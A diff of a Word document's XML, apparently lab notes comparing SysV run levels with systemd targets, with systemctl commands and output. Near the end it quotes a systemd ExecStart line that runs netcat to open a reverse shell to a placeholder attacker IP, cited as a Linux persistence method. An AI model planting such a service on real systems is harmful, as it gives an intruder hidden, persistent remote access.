+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>rc.d</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>/rc5.d.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">To ease the burden of keeping track of the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>symlinks</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> in the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>rc.d</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> directories</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">, </w:t>
@@ -639,33 +1011,55 @@
       <w:r>
         <w:t xml:space="preserve">called </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
         <w:t>chkconfig</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve">, but it is not always part of the default installation.  The systemd utilities do not support the </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
         <w:t>chkconfig</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> command, so we won’t be able to use it here.</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">  In addition to maintaining the rc.d directories</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>, chkconfig</w:t>
-      </w:r>
+        <w:t xml:space="preserve">  In addition to maintaining the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>rc.d</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> directories</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>chkconfig</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -721,21 +1115,25 @@
       <w:r>
         <w:t xml:space="preserve">, </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
         <w:t>init</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> or </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
         <w:t>telinit</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>,</w:t>
       </w:r>
@@ -748,20 +1146,36 @@
       <w:r>
         <w:t xml:space="preserve"> would be </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>init 1</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>init</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 1</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">, and </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>init 2</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>init</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 2</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> would take you back to the GUI.</w:t>
@@ -779,12 +1193,21 @@
       <w:r>
         <w:t xml:space="preserve">The closest systemd equivalent to </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:iCs/>
-        </w:rPr>
-        <w:t>chkconfig --list</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>chkconfig</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --list</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> from SysV is</w:t>
@@ -1265,7 +1688,43 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>[john@john ~]$ systemctl list-units --type target</w:t>
+        <w:t>[</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>john@john</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>~]$</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> systemctl list-units --type target</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1295,13 +1754,43 @@
           <w:szCs w:val="18"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>basic.target           loaded active active Basic System</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>basic.target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">           loaded active </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>active</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Basic System</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1313,13 +1802,43 @@
           <w:szCs w:val="18"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>cryptsetup.target      loaded active active Encrypted Volumes</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>cryptsetup.target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">      loaded active </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>active</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Encrypted Volumes</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1331,13 +1850,43 @@
           <w:szCs w:val="18"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>getty.target           loaded active active Login Prompts</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>getty.target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">           loaded active </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>active</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Login Prompts</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1349,13 +1898,43 @@
           <w:szCs w:val="18"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-        <w:t>graphical.target       loaded active active Graphical Interface</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>graphical.target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">       loaded active </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>active</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Graphical Interface</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1373,7 +1952,27 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve">local-fs-pre.target    </w:t>
+        <w:t>local-fs-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>pre.target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1389,7 +1988,25 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t xml:space="preserve"> active active Local File Systems (Pre)</w:t>
+        <w:t xml:space="preserve"> active </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>active</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Local File Systems (Pre)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1407,7 +2024,45 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>local-fs.target        loaded active active Local File Systems</w:t>
+        <w:t>local-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>fs.target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        loaded active </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>active</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Local File Systems</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1425,7 +2080,45 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>multi-user.target      loaded active active Multi-User System</w:t>
+        <w:t>multi-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>user.target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">      loaded active </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>active</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Multi-User System</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1443,7 +2136,45 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>network-online.target  loaded active active Network is Online</w:t>
+        <w:t>network-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>online.target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  loaded active </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>active</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Network is Online</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1466,7 +2197,25 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>In this case, both multi-user.target and graphical.target are active, so we must be in run level 5.</w:t>
+        <w:t>In this case, both multi-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>user.target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>graphical.target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> are active, so we must be in run level 5.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1496,8 +2245,19 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:iCs/>
         </w:rPr>
-        <w:t>systemctl isolate multi-user.target</w:t>
-      </w:r>
+        <w:t>systemctl isolate multi-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>user.target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -1506,7 +2266,25 @@
         <w:br/>
       </w:r>
       <w:r>
-        <w:t>This will cause all services required by the multi-user.target unit file to continue or start, as needed.  All services not required by multi-user.target (all the graphical stuff in our case) will be stopped.</w:t>
+        <w:t>This will cause all services required by the multi-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>user.target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> unit file to continue or start, as needed.  All services not required by multi-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>user.target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> (all the graphical stuff in our case) will be stopped.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1528,8 +2306,19 @@
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:iCs/>
         </w:rPr>
-        <w:t>systemctl isolate graphical.target</w:t>
-      </w:r>
+        <w:t xml:space="preserve">systemctl isolate </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>graphical.target</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1560,7 +2349,14 @@
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
         </w:rPr>
-        <w:t xml:space="preserve"> -na</w:t>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>na</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1568,6 +2364,7 @@
         </w:rPr>
         <w:t>t</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -1650,8 +2447,13 @@
         <w:t xml:space="preserve"> shows several methods of </w:t>
       </w:r>
       <w:r>
-        <w:t>gaining persistance</w:t>
-      </w:r>
+        <w:t xml:space="preserve">gaining </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>persistance</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> on a Linux box.  The method in the paragraph “</w:t>
       </w:r>
@@ -1666,11 +2468,47 @@
       <w:r>
         <w:t xml:space="preserve">Some notes: instead of using the line </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-        </w:rPr>
-        <w:t>ExecStart=/usr/bin/nc -e /bin/bash &lt;ATTACKER_IP&gt; &lt;PORT&gt; 2&gt;/dev/null</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>ExecStart</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>=/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>/bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -e /bin/bash &lt;ATTACKER_IP&gt; &lt;PORT&gt; 2&gt;/dev/null</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1694,11 +2532,40 @@
         <w:t xml:space="preserve"> to start a simple netcat listener.</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">  The nc executable is in a different place in Ubuntu 18</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> (/bin/nc vs. his /usr/bin/nc</w:t>
-      </w:r>
+        <w:t xml:space="preserve">  The </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> executable is in a different place in Ubuntu 18</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (/bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> vs. his /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>usr</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/bin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>.</w:t>
       </w:r>
@@ -1729,11 +2596,33 @@
       <w:r>
